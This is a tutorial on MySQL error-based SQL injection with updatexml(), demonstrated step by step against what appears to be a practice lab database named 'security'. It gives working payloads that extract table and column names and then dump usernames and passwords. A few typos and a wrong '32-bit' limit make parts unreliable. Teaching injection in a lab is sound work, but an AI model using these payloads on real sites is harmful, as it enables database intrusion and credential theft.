#introduce
Updatexml() function
Updatexml(XML_Document, Xpath_string, new_value) contains three parameters
The first parameter: XML_Document is in string format, which is the name of the object of the XML document, such as Doc
The second parameter: XPath_string is the path, a string in XPath format
The third parameter: new_value, in string format, replaces the data of the found symbol condition
#updatexml error reporting principle
The error reporting principle of Updatexml is exactly the same as that of extractvalue().
Use select updatexml, and then deliberately write the wrong path when using the path, which will cause his error. When we use it, we also execute a select query before reporting an error, and then wait for the echo after the error is reported. What we echo is the content we want to view.
Note: updatexml, like extracevalue, can only query 32-bit strings, so you still need to use the substring function
# updatexml() injection writing method analysis
and 1=updatexml(1,2,3)
1: Write the first parameter casually
2.concat(1,2)
(1): 0x7e or '~'
(2): (select query statement)
3. Write the third parameter casually
例: and 1=updatexml(1,concat('~',(select database())),3)
#case demo
Use updatexml() to report error injection
1. Determine the character type/digital type, if it is a character type, determine the closing method
Throw a single quotation mark in first, the page is normal
Throwing a "double quotation mark in, the page reports an error
Take out the content of the error
'"1"" LIMIT 0,1'
"1"" LIMIT 0,1
The red double quotes are what we entered
Through the page's echo error report, it is determined that "double quotation marks are used to close the
2. Get the database name
?id=1" and updatexml(1,concat('~',(select database())),3) --+
Make sure the data is security
3. Get the data table
?id=1" and 1=updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+
data sheet
emails
referers
agents
users
4. Get all field information in the users data table
?id=1" and 1=updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='users' and table_schema=database())),3)--+
field is
id
username
password
5. Unloading (using the substring function)
?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'--',password),1,30)from security.users)),3) --+
If you need to see more user information, you only need to change the last two parameters of substr
The above is the error injection of the character type. If it is a digital type, it is the same, but it does not need to be closed and commented to test directly.
For example?id=1 and=updatexml(1,concat('~',(select databatse())),3)